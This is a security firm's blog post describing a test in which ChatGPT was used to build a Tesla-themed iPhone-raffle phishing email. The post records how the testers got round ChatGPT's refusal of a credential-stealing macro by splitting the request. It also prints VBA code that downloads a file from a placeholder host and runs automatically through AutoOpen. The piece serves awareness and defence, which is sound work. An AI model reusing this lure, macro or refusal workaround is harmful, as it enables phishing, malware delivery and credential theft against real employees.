Is ChatGPT Your Next Phishing Enemy?

AI Phishing with ChatGPT

AI technologies such as ChatGPT and Google Bard have the potential to revolutionize productivity and convenience. However, the negative implications of AI, specifically in the realm of cybersecurity, are often overlooked.

For instance, tools like ChatGPT can greatly aid marketing employees in creating templates, emails, logos, and more with speed and efficiency. Unfortunately, these same tools can be exploited by malicious actors to easily craft convincing phishing emails.

According to IBM’s X-Force Threat Intelligence Index 2023, phishing was the initial access vector in up to 41% of incidents, frequently through employees unwittingly opening malicious documents (“maldocs”) attached to phishing emails. Despite advancements in email scanners and antivirus solutions, such incidents continue to rise.

To illustrate the risks associated with AI-generated phishing emails, Pensive Security conducted a test using the ChatGPT 3.5 service to create a reasonably believable phishing campaign with minimal user input.

Generating the Email Template

We began by asking ChatGPT to create an email template for the target company; in this case, we specified Tesla.com and included a link to their logo and color scheme. ChatGPT responded with a basic “Thank you for subscribing”-style template that was well written and contained no misspellings or grammatical errors. The template even included a link to the Tesla website at the bottom.

Email Template Iteration #1

A common phishing tactic is to incentivize users to open a maldoc or submit their personal information to a phishing site with the promise of a reward, such as a free iPhone or vacation. We asked ChatGPT to edit the template to reflect an end-of-year iPhone raffle that employees would need to enter to be eligible. Again, ChatGPT responded with a great template body; however, it still appeared to be writing to Tesla’s customers instead of its employees:

Email Template Iteration #2

Targeting Internal Employees: Setting the Bait

After a few input suggestions, we were able to change the contest to one focused on internal employees that asks the user to open an attached maldoc and run a macro. We requested that the macro open a dialog box asking for the user’s username and password and send the credentials to a site controlled by Pensive Security.

Fortunately, ChatGPT recognized that such a request is often made for nefarious purposes and blocked the updated template:

ChatGPT Detected Malicious Request

We then decided to ask ChatGPT to create a macro that would download a file called entry to the user’s desktop. In this example, the file is a sample text document; however, in a real phishing campaign, such a file is often a remote-access trojan or a PowerShell script that can provide access to a company’s internal network or infect the machine with ransomware.

Sample Macro to Download File
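For readers who cannot see the screenshot, the sketch below shows what a comparable benign proof-of-concept macro might look like. This is our illustration rather than ChatGPT’s exact output: the download URL (https://example.com/entry.txt) is a placeholder for the Pensive Security-controlled endpoint used in the test, and the declaration assumes a modern (VBA7) Office install.

```vba
' Benign proof-of-concept: download a sample text file named "entry"
' to the current user's desktop. The URL below is a placeholder.
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" ( _
    ByVal pCaller As LongPtr, ByVal szURL As String, _
    ByVal szFileName As String, ByVal dwReserved As LongPtr, _
    ByVal lpfnCB As LongPtr) As Long

Sub DownloadEntryFile()
    Dim url As String
    Dim destination As String

    url = "https://example.com/entry.txt"   ' placeholder URL
    destination = Environ("USERPROFILE") & "\Desktop\entry.txt"

    ' URLDownloadToFile returns 0 (S_OK) on success.
    If URLDownloadToFile(0, url, destination, 0, 0) = 0 Then
        MsgBox "Contest entry file saved to your desktop."
    Else
        MsgBox "Download failed."
    End If
End Sub
```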

We then regenerated the template with explicit instructions to open the attached maldoc, enable macros, and run the entry file downloaded to the desktop. We kept the maldoc simple, adding only the company’s logo and a brief instruction to enable macros and run the corresponding file.

The Final Proof-of-Concept

After a few further tweaks, such as editing the macro to run as soon as the maldoc was opened (a trigger sketched after the proof of concept below) and modifying the download URL, we were ready to send out our AI-generated phishing email:

AI-Generated Phishing Email

An unsuspecting user receives our email and follows the instructions, which executes the payload:

Macro Executes as a Proof of Concept
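The run-on-open tweak mentioned above relies on Word’s automatic macro names. A minimal sketch, assuming the hypothetical DownloadEntryFile routine from earlier:

```vba
' Word runs a macro named AutoOpen automatically when a document is
' opened with macros enabled, so the user never has to click "Run".
' DownloadEntryFile is the hypothetical routine sketched earlier.
Sub AutoOpen()
    DownloadEntryFile
End Sub
```

This is why “enable macros” is the pivotal click in most maldoc campaigns: once macros are enabled, no further user interaction is required.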

The Future of Phishing Is AI

When we first set out to test AI-generated phishing, we were admittedly somewhat skeptical: could these tools reliably generate convincing, human-like emails that would entice users to run their contents?

We believe the above proof of concept demonstrates that, with minimal technical knowledge, an attacker can easily create specifically targeted phishing emails with tools such as ChatGPT and Bard. These tools have already reached the point where it is difficult to distinguish real emails and communications from computer-generated ones.

ChatGPT itself provides a list of possibilities for the future of AI phishing.

ChatGPT’s Conclusion

The following was generated by ChatGPT 3.5 Turbo:

The danger of AI-generated phishing emails lies in their ability to mimic human communication and bypass traditional spam filters. AI algorithms can analyze large datasets of legitimate emails to understand patterns, language usage, and contextual information, allowing them to generate highly convincing phishing messages. These emails may contain personalized details, appear to come from trusted sources, or imitate the tone and style of genuine communications, making them difficult to detect as fraudulent.

The future use and impact of AI-generated phishing emails are likely to be concerning. Here are some potential predictions:

Increased sophistication: As AI technology advances, phishing emails will become even more sophisticated and possibly indistinguishable from genuine messages. AI algorithms will continuously learn from successful attacks, adapting their tactics and evolving to bypass security measures.

Targeted attacks: AI can analyze publicly available information from social media, online profiles, or leaked databases to personalize phishing emails and target individuals or organizations with tailored content. This approach increases the effectiveness of attacks, as recipients are more likely to trust emails that appear relevant and familiar.

Automation and scale: AI-powered systems could one day automate an entire phishing process, from generating emails to launching attacks on a massive scale. This capability enables cybercriminals to target a large number of individuals simultaneously, increasing the chances of success and maximizing the impact of their campaigns.

Impersonation of trusted entities: AI algorithms can imitate the communication styles and patterns of well-known brands, companies, or even individuals close to the target. This impersonation creates a sense of trust, making recipients more likely to disclose sensitive information or perform malicious actions.

Evasion of security measures: AI-generated phishing emails have the potential to evade traditional email security filters and anti-phishing technologies. Cybercriminals can leverage AI techniques to identify and exploit vulnerabilities in email systems, making it challenging for users and organizations to defend against these attacks.

To mitigate the risks associated with AI-generated phishing emails, it will be crucial to develop advanced security solutions that can detect and counter these evolving threats. Organizations and individuals should also maintain a high level of awareness, employ strong security practices, and exercise caution when interacting with suspicious emails or providing sensitive information online.

Want to learn more? Schedule a call with a cybersecurity expert today!
